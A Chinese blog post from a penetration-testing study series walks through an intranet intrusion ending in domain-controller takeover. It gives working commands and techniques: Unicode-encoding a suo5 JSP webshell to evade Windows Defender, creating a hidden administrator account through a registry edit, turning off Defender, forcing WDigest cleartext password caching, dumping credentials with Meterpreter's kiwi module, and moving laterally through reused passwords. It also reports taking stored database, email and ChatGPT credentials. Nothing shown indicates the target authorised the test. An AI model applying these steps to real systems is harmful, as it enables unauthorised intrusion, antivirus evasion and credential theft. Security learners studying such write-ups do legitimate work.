一次丝滑的内网渗透拿下域控

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 使用FofaSpider和Python联动批量挖洞
  27. 记一次简单的对盗号网站的渗透
  28. 记一次幸运的漏洞挖掘
  29. 记一次从外网打通AWS云
  30. 内网渗透初探

前言

外网打点是怎么拿的就不说了,跟前三篇博客一样。总之得到了一个jsp的webshell,执行cmd失败。
在这里插入图片描述
我上一篇博客说是哥斯拉的问题,其实不对,实际上是被Windows Defender制裁了,但是绕过的方法也很简单,把上篇博客的webshell上传上去就好了。

看一眼权限whoami
在这里插入图片描述
system,故事的开始总是这么完美。

看看杀软:tasklist /svc
在这里插入图片描述
Windows Defender,故事的开始总是有些遗憾。。

上线rdp

被杀软制裁

上一篇博客我是直接用内存注入上线了cs,但这台服务器的wd比较厉害上线不了cs,所以选择上线rdp。

可以查到rdp端口为默认的3389
在这里插入图片描述
但是外网无法连通,原因不明。

在这里插入图片描述
这边选择走suo5的代理然后用127.0.0.1上线。

直接上传suo5的jsp shell,瞬间被杀。
在这里插入图片描述
那还能咋办,免杀呗

suo5免杀

这边选择用Unicode加密的方法进行免杀。

大概的方法就是,jsp代码里边<%!%>围起来的定义片段和<%%>围起来的可执行代码片段,可以整体unicode加密,然后嵌在标识符里,是可以正常解析的。

例如原本的代码是:

<%! 
    public void hello(JspWriter out) throws Exception {
        out.println("hello world");
    }
%>
<%
    hello(out);
%>

可以写成如下的形式,也可以正常解析:

<%! \u0070\u0075\u0062\u006C\u0069\u0063\u0020\u0076\u006F\u0069\u0064\u0020\u0068\u0065\u006C\u006C\u006F\u0028\u004A\u0073\u0070\u0057\u0072\u0069\u0074\u0065\u0072\u0020\u006F\u0075\u0074\u0029\u0020\u0074\u0068\u0072\u006F\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0020\u007B\u000A\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0068\u0065\u006C\u006C\u006F\u0020\u0077\u006F\u0072\u006C\u0064\u0022\u0029\u003B\u000A\u0020\u0020\u0020\u0020\u007D %>
<% \u0068\u0065\u006C\u006C\u006F\u0028\u006F\u0075\u0074\u0029\u003B %>

在这里插入图片描述
因此,通过此原理我们可以直接爆改我们的suo5.jsp,实现免杀。

由于代码太长,我这里只放一部分,实战中自己去加密替换就好了,要注意最前边导入的部分不能加密。

<%@ page import="java.nio.ByteBuffer" %><%@ page import="java.io.*" %><%@ page import="java.net.*" %><%@ page import="java.security.cert.X509Certificate" %><%@ page import="java.security.cert.CertificateException" %><%@ page import="javax.net.ssl.*" %><%@ page import="java.util.*" %>
<%! \u0070\u0075\u0062....... %>
<% \u0053\u0075\u006F......%>

直接上传,成功连接
在这里插入图片描述

上线

创了一个管理员用户,挂好代理,成功上线rdp

net user tt$ Tt@123456 /add
net localgroup Administrators tt$ /add
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v tt$ /t REG_DWORD /d 0 /f

在这里插入图片描述
先把wd关了,免得坏我好事。
在这里插入图片描述

抓密码

上线后因为未知原因无法上线cs,所以选择上线msf。
在这里插入图片描述
上线之后先改注册表抓明文密码:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在这里插入图片描述
之后等待管理员登录就有密码了。
。。。。。
一天后,使用msf的kiwi模块抓密码。

先提到system权限getsystem
在这里插入图片描述
然后直接抓

load kiwi
creds_all

在这里插入图片描述
直接使用管理员凭证成功上线。
在这里插入图片描述

内网渗透

信息收集

在配置文件找到了数据库账号密码和邮箱账号密码
在这里插入图片描述
在这里插入图片描述
执行指令看看

ipconfig
systeminfo

把执行结果交给ai,得到如下信息:

项目说明
本机 IP192.168.1.182有线网卡 IPv4 地址,用于局域网访问
内网网段192.168.1.0/24对应子网掩码 255.255.255.0,可用 IP 范围 192.168.1.1–192.168.1.254
当前域用的互联网域名,不能放本机加入的域
域中权限域成员工作站 (Member Workstation)不是域控制器,属于普通域成员,无管理整个域的权限

查一下域信息:nltest /dsgetdc:域名
在这里插入图片描述

域控IP是192.168.1.101

还是有点麻烦的。

密码复用

在系统里搜索.rdp文件,发现192.168.1.93的连接信息
在这里插入图片描述
赌一把,直接用抓到的密码登录,赌他们会密码复用!
在这里插入图片描述
赌赢了,成功上线
在这里插入图片描述
发现了ChatGPT的账号密码
在这里插入图片描述

拿下域控

还是密码复用,直接上线rdp
在这里插入图片描述
又找到一个数据库凭证
在这里插入图片描述
还在桌面上看到一个名叫pass.txt的文件

在这里插入图片描述

666演都不演了

总结

不要复用密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值